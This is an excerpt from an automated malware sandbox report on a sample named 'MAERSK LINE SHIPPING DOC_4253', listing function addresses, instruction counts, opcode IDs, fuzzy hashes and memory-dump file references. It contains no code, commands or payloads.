                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 527d8878932a6af64b3abf13d602025e98fd4a3c9e9cbaf94eff06c14d5915e4
                                                    • Instruction ID: 9f5622adff493db750adcbd58f35849fd49acc176393a00cb3cab9d8dcea040c
                                                    • Opcode Fuzzy Hash: 527d8878932a6af64b3abf13d602025e98fd4a3c9e9cbaf94eff06c14d5915e4
                                                    • Instruction Fuzzy Hash: C0F01235704259AF9B055F59E84486EFFA6FB8C220710802AFD15C3351DB718C25DB90
                                                    Function 07C4BBED Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb3cc1eb4fa9a37210ea70ee96acf8b4e6bfaae9ac82c303170aad90904f54f2
                                                    • Instruction ID: 062823aa80332ccf391cf459c35c5042b300bf12cb6406870887c30cfbeac4b5
                                                    • Opcode Fuzzy Hash: cb3cc1eb4fa9a37210ea70ee96acf8b4e6bfaae9ac82c303170aad90904f54f2
                                                    • Instruction Fuzzy Hash: 2CF01274A011089FC748EF99C590A5DBBF6FF98310F2085559409DB348CB31AC46CB91
                                                    Function 07C4AEEA Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07d03de46b567a209ecd4acfcdb37a186ab8955f2e59c42f2186c264c4849b2f
                                                    • Instruction ID: a259a5e66cfd9a157426d8591d7e70f1663c0318bc798ff1f9787dd6424c160e
                                                    • Opcode Fuzzy Hash: 07d03de46b567a209ecd4acfcdb37a186ab8955f2e59c42f2186c264c4849b2f
                                                    • Instruction Fuzzy Hash: 1EF0B470A85345EFDF019FB4CC5AAADBB72AF46304F00C152E522662D1C7745915CB61
                                                    Function 07C49E5B Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e225efe5788706fdbcbd11516a8781a3cc2f7c1cb1d4951e831a3da1dce02bc9
                                                    • Instruction ID: d22edcf833317378bea8abe89c1412b4c5d5743bcb0db865d2e028ce186e7252
                                                    • Opcode Fuzzy Hash: e225efe5788706fdbcbd11516a8781a3cc2f7c1cb1d4951e831a3da1dce02bc9
                                                    • Instruction Fuzzy Hash: 2BF0E9B05093C28FC3134B3D8C905AA7FB1AF43104F18449AC1C287293C6251C09C752
                                                    Function 07C49D78 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7eba138f6498328f9e63a55697c102b9c2aad209eae487d47fe956b574b05186
                                                    • Instruction ID: 6c4caa71115822c1028f448f17b0999f4053cbb6daf274907b1df8a4245769af
                                                    • Opcode Fuzzy Hash: 7eba138f6498328f9e63a55697c102b9c2aad209eae487d47fe956b574b05186
                                                    • Instruction Fuzzy Hash: 6AE0D8D066C2609BCF0D363A582D977AFA25F87210F0441ABC007CA5D3E936A4184252
                                                    Function 07C47D51 Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 346cf52c40cbfd5986efd6210cc9de5cfe124eb845198faac510fcc004f539e0
                                                    • Instruction ID: 87039cd0f2b08f379f4e8cba21d6fe04e344ac80e7538cadc250c305ba1eb826
                                                    • Opcode Fuzzy Hash: 346cf52c40cbfd5986efd6210cc9de5cfe124eb845198faac510fcc004f539e0
                                                    • Instruction Fuzzy Hash: 3EF0E5749E91549ECB504634D0506B57F62AB9330EF28C0ADD45A4F583C77FC943CB11
                                                    Function 07C420C8 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8e941f352c9f779bb70534603415994cd3a91f5e6af927385791b3eaeda3de6
                                                    • Instruction ID: 97964a46af6b26da8624735ceeb8cdd667ca225d1e1d2b54fab0bcaf06af2cd1
                                                    • Opcode Fuzzy Hash: b8e941f352c9f779bb70534603415994cd3a91f5e6af927385791b3eaeda3de6
                                                    • Instruction Fuzzy Hash: 4AE07D727082058FF3015F71595A3F63B7DFF93101B068193F046CB681CE288942E720
                                                    Function 07C4B8F2 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d406627b62c4a9f9b64572b5f6e8d4adaf19c28bddfd3f651c2541e04105ebec
                                                    • Instruction ID: 490be0262bdf84263e99f6879325fa8536bf25f4ef6c5e675fa0391f6297fc8c
                                                    • Opcode Fuzzy Hash: d406627b62c4a9f9b64572b5f6e8d4adaf19c28bddfd3f651c2541e04105ebec
                                                    • Instruction Fuzzy Hash: 8DE086E092C08CDB8718DFAA5C840397BF09777220F100989C40B87205D632CC109763
                                                    Function 07C48140 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dfbeaa18fec12b0e35be3e54492ffb7252d0e01dbefbbecfcdfa1e711e2b2443
                                                    • Instruction ID: f59da4e3d8fbbc99723e5fcd9c8003dd6324517c86eac24a6f7bd5efae34eff9
                                                    • Opcode Fuzzy Hash: dfbeaa18fec12b0e35be3e54492ffb7252d0e01dbefbbecfcdfa1e711e2b2443
                                                    • Instruction Fuzzy Hash: 10E0D8B4519642CFD355DB78C8682267BF0FF47314F04C89794558B293CB34AC0AC761
                                                    Function 07C4C0D6 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 762cb6452393495c9edf5acb4b6bd19877b5b8e9803b63614a7dd3c078b19044
                                                    • Instruction ID: a0a0d04831ec59978f4471b0079d211b364c7e5ce7c6e760e0fd94bc0a12d9fd
                                                    • Opcode Fuzzy Hash: 762cb6452393495c9edf5acb4b6bd19877b5b8e9803b63614a7dd3c078b19044
                                                    • Instruction Fuzzy Hash: 94E0CDB056F108DF8334865B55155753BB9DF4E301F10825BD507D7624CA5148014632
                                                    Function 07C4C091 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bb3c57b2376dae37368302a1d424e1203a6b9086bad1b020477d91e3bccac90
                                                    • Instruction ID: c33b9ee9584abaed6b0b7e7cbe53d936d71b5a42b9c30c3178dfc5589ef24394
                                                    • Opcode Fuzzy Hash: 8bb3c57b2376dae37368302a1d424e1203a6b9086bad1b020477d91e3bccac90
                                                    • Instruction Fuzzy Hash: 20E0E2D516F2989EC72592BA98284B97F68AE6B204F250A8BC50B87176E612481A4732
                                                    Function 07C49D88 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4373dcb9c901aea5e10a2a77a82291e2a2f6dad9e4f3d8eeb2b8671ca954622
                                                    • Instruction ID: 7b92cad0d21662c1549b1a7452677d412beb520a887de406bebd7ea7a31b7812
                                                    • Opcode Fuzzy Hash: c4373dcb9c901aea5e10a2a77a82291e2a2f6dad9e4f3d8eeb2b8671ca954622
                                                    • Instruction Fuzzy Hash: BFD0A7D027C134C7CD4C367B540CA3BFBA69B8BB00F0045A5940B8B296EE32F8204296
                                                    Function 07C4B8F8 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5978e1ddde050808a9cdad6df7e3c42a3456a4c01fbb335b5d688f9ba32a5de5
                                                    • Instruction ID: 44f374ea9258887ec95b0b0a5ea219fe9e4c0f389a93441cb072abacabddf746
                                                    • Opcode Fuzzy Hash: 5978e1ddde050808a9cdad6df7e3c42a3456a4c01fbb335b5d688f9ba32a5de5
                                                    • Instruction Fuzzy Hash: CAD05EE0A3C50CEB4218AE9B5C4413977F8A77B220F104C86980F87304EA32CD0053B3
                                                    Function 07C4AE9B Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 831704b3dee365ea7bcfc1f0871556730c11bba9735539d1778b090b3a3f0749
                                                    • Instruction ID: 7e76d07630b4d2c0e5e432d0f2360511563d269b293ed95994200e2f4f6011b0
                                                    • Opcode Fuzzy Hash: 831704b3dee365ea7bcfc1f0871556730c11bba9735539d1778b090b3a3f0749
                                                    • Instruction Fuzzy Hash: E9E09AB1C19B858FC705CF79CCD116ABFF2BE42204B0884ABC0659B116C330A816CB82
                                                    Function 07C40DE8 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90be87b32a86dd9f6d534d7b9bfe5b7c6f4dc0799c8bc7f03df897d0107b27e1
                                                    • Instruction ID: 3f540f85974ac1beb1a7d5c4dc3599ccb5f865f5cb80cb0bd04792efe04c0be1
                                                    • Opcode Fuzzy Hash: 90be87b32a86dd9f6d534d7b9bfe5b7c6f4dc0799c8bc7f03df897d0107b27e1
                                                    • Instruction Fuzzy Hash: 9BE01A71814A0DDECB55EF78C5486A97BF4BB11614F00C26AE99C9A115E73182E4CF80
                                                    Function 07C4B059 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37caac4006d25b344d3e06edf03702055c4542cda3de0a9ab5a3d2f60f019065
                                                    • Instruction ID: ed13ca7ee4a03dd8fceec3431e2e5bd6be0b6f6f31ec8e60f032b480d6678fcc
                                                    • Opcode Fuzzy Hash: 37caac4006d25b344d3e06edf03702055c4542cda3de0a9ab5a3d2f60f019065
                                                    • Instruction Fuzzy Hash: 29D05E64F54209ABE308EFB2988453E6BE3B788A10F50C8A9A813DB384DE308C058651
                                                    Function 07C40DF8 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5a504a7357f2544af37676e6639835cc91a01d29da33486e6479b18c9ed0132
                                                    • Instruction ID: ec8eadada7393813d00c638ba05ea17637864caefc63562786e834691f4544ee
                                                    • Opcode Fuzzy Hash: e5a504a7357f2544af37676e6639835cc91a01d29da33486e6479b18c9ed0132
                                                    • Instruction Fuzzy Hash: 3AE0E27185461CDE8B40EE79D94459A7FE8AB15221F00C56AE9899A110EA31D2E8CB84
                                                    Function 07C420D8 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ff4cfa79b3c2324129a5b9fdb5b27324b45315056bf4ec22ed2767a1183d3fb
                                                    • Instruction ID: 81369fe7fcd10211abaee2c478e4b5029b94673e0bb157d8beb0fb97df1dc801
                                                    • Opcode Fuzzy Hash: 3ff4cfa79b3c2324129a5b9fdb5b27324b45315056bf4ec22ed2767a1183d3fb
                                                    • Instruction Fuzzy Hash: CED0A77070420947B3006FB2591B37537EEFB84501B458025F109C7580DF24D941E751
                                                    Function 07C4C0A0 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43f211351bc1f35776cdc150b742090a7ae977e86e349900f467fdd6a352429c
                                                    • Instruction ID: 3ff78dacb98f64e4da1f8d6c62dc7cb0613ec65e581ef81a68ad0b3ad1d31862
                                                    • Opcode Fuzzy Hash: 43f211351bc1f35776cdc150b742090a7ae977e86e349900f467fdd6a352429c
                                                    • Instruction Fuzzy Hash: 73C08CD423F20CCB8038A1EF151C43C3BADA5BF300F10460BCA0B4213AEA1388110633
                                                    Function 07C46681 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b8bb197e30c0dc2b2cfa6597acb39e4d2f812eb1b54355e1eb47d68d91759c9
                                                    • Instruction ID: 4353257659693822775cdbac494a05efc44d1aeb5137684360040d26343c0e1c
                                                    • Opcode Fuzzy Hash: 1b8bb197e30c0dc2b2cfa6597acb39e4d2f812eb1b54355e1eb47d68d91759c9
                                                    • Instruction Fuzzy Hash: B3C08CA101D3CCBFC3031AB5B40A0F73F38460322070B00C3E8868D863C62A28E8CAA2
                                                    Function 07C4C2EA Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f585d52255cca56010ef0138209c0be04a7fe5e6e148384ad0875134a1652c2
                                                    • Instruction ID: 3a6e0967d835e5feb1f1af185e020bf836259999bf65fb82da724e315fe28e06
                                                    • Opcode Fuzzy Hash: 0f585d52255cca56010ef0138209c0be04a7fe5e6e148384ad0875134a1652c2
                                                    • Instruction Fuzzy Hash: CDC08CF002E1DCD68B3086EA90643B87F20680B204F2402CDD04B67833C6C20456B736
                                                    Function 07C4E318 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b10a244c970b5219a87d37a4a73df46fd1ab2e64df5246c04452d39d2d9d13de
                                                    • Instruction ID: 0434b8f0b42ae1f7f5f0becd7f4411ffb9325844a74bfb8221492d425a73e112
                                                    • Opcode Fuzzy Hash: b10a244c970b5219a87d37a4a73df46fd1ab2e64df5246c04452d39d2d9d13de
                                                    • Instruction Fuzzy Hash: 4AC02BB0001305C7C3142FE8F90EB6C37B86701716F440011E10C900708FB81440C675
                                                    Function 07C4BCB0 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32c2cc26b697693a7906805d20b4500789dbff30572177bddfdea33b3e867ea0
                                                    • Instruction ID: 94a41889ab9464ea837ea1c57daffd6499e82a4f49590838e13717f14e53959a
                                                    • Opcode Fuzzy Hash: 32c2cc26b697693a7906805d20b4500789dbff30572177bddfdea33b3e867ea0
                                                    • Instruction Fuzzy Hash: 3FD0C9B2418150DFC300CF61DD99D887BF0BE1A300704098AC0055B222D220A811CB81
                                                    Function 07C4C2F0 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00db6a0587ac8d2bfc057b95ac99b1ca17f0ded581c135f568a65af60f6e1062
                                                    • Instruction ID: 8a4895bdd349c8c5fc696e04905832c8bc1845227e61760c7ea96e6f91d2d230
                                                    • Opcode Fuzzy Hash: 00db6a0587ac8d2bfc057b95ac99b1ca17f0ded581c135f568a65af60f6e1062
                                                    • Instruction Fuzzy Hash: 12B012E403F20CC2053021DB2028335771C700BA08F000156E10F3183119C214613177
                                                    Function 07C4770C Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00612b4e74ec8ec6bb05ea2cbfb575852147de4ad8a90ea3e70013b906cb8eb5
                                                    • Instruction ID: 51be40d52d334a89d59fe288a41ca5380cb05e4edde35a94044c27727ac3db23
                                                    • Opcode Fuzzy Hash: 00612b4e74ec8ec6bb05ea2cbfb575852147de4ad8a90ea3e70013b906cb8eb5
                                                    • Instruction Fuzzy Hash: F6B012B61E9501E380027BE44D89A3E9E50FBB2700F80DD11334C5003CC732442CF217
                                                    Function 07C4B9C1 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1bca29ee944103d858971eddf37c0f19d16f15ccf32c4df232e1669f5184ee7
                                                    • Instruction ID: 4abd1a441e9722d2dd330f6f270df311c08664ee928fddb8f0921df4b1110c58
                                                    • Opcode Fuzzy Hash: d1bca29ee944103d858971eddf37c0f19d16f15ccf32c4df232e1669f5184ee7
                                                    • Instruction Fuzzy Hash: 83C04CF0B64219EFDB118E52DF86E6C77766B55B40F100520A6026A194D7609D018640
                                                    Function 07C46690 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46928fa978252f48f6c5de6e87bd33b14e6928fdb0afc8231a7d968c317efbe0
                                                    • Instruction ID: 15d99d3a1f992c0955d1c9bf1123f2958f6e2dddfcc76dc8a8170c1327aef424
                                                    • Opcode Fuzzy Hash: 46928fa978252f48f6c5de6e87bd33b14e6928fdb0afc8231a7d968c317efbe0
                                                    • Instruction Fuzzy Hash: 71A011B0028A0CEB82002282A00A2BA3F3C2003208B000000EC0B28008AB3A38280088
                                                    Function 07C4770B Relevance: .0, Instructions: 1COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7902699be42c8a8e46fbbb4501726517e86b22c56a189f7625a6da49081b2451
                                                    • Instruction ID: f1e17605925ed1a30a107447fa6b318daa173da8e92ad69f31823c934e5b3a0c
                                                    • Opcode Fuzzy Hash: 7902699be42c8a8e46fbbb4501726517e86b22c56a189f7625a6da49081b2451
                                                    • Instruction Fuzzy Hash:

                                                    Non-executed Functions

                                                    Function 098F6D08 Relevance: 8.0, Strings: 6, Instructions: 501COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'_q$4'_q$4'_q$4|dq$4|dq$$_q
                                                    • API String ID: 0-271859681
                                                    • Opcode ID: c5a748b14558ea46e985a6d75f9a27202237335f495243cdd9a780ee75920baf
                                                    • Instruction ID: 7e41985a0ce660e307ec5b04af62e42e7212bc205efdd8f780f4b30d37ef6b56
                                                    • Opcode Fuzzy Hash: c5a748b14558ea46e985a6d75f9a27202237335f495243cdd9a780ee75920baf
                                                    • Instruction Fuzzy Hash: CFF1F0317012158FDB29DF7CC4A4A6E7BA2BF85340B2955ADE606CB361DB31DC42C7A1
                                                    Function 07FA3058 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: qeD
                                                    • API String ID: 0-982779437
                                                    • Opcode ID: 8f259118f3cf9a8e07c2a0bd0277d48f8ae727d4d18278d97ddb6db5eac39e31
                                                    • Instruction ID: 26a051e3618f25037e08f5f50f9fa39455e15a1d1adaff836dbc04a5f71af982
                                                    • Opcode Fuzzy Hash: 8f259118f3cf9a8e07c2a0bd0277d48f8ae727d4d18278d97ddb6db5eac39e31
                                                    • Instruction Fuzzy Hash: 73E1F6B4E042199FCB14DFA9C5809AEBBF2FF89304F288169D414AB355CB34AD41CF61
                                                    Function 098F1230 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: 39f605a57f3a49b8778fd9cdda0aaa66488867afdb07b4a54c1ca97b4af042e1
                                                    • Instruction ID: 099240d3b9350ec2d2811b9da6e616c5db5e598559120aea389fcdac748c7456
                                                    • Opcode Fuzzy Hash: 39f605a57f3a49b8778fd9cdda0aaa66488867afdb07b4a54c1ca97b4af042e1
                                                    • Instruction Fuzzy Hash: A851D571D04229CBDB28DF66CC547DABBB2BB99301F4081AA941DAB354DB355A85CF40
                                                    Function 07FA4BC8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
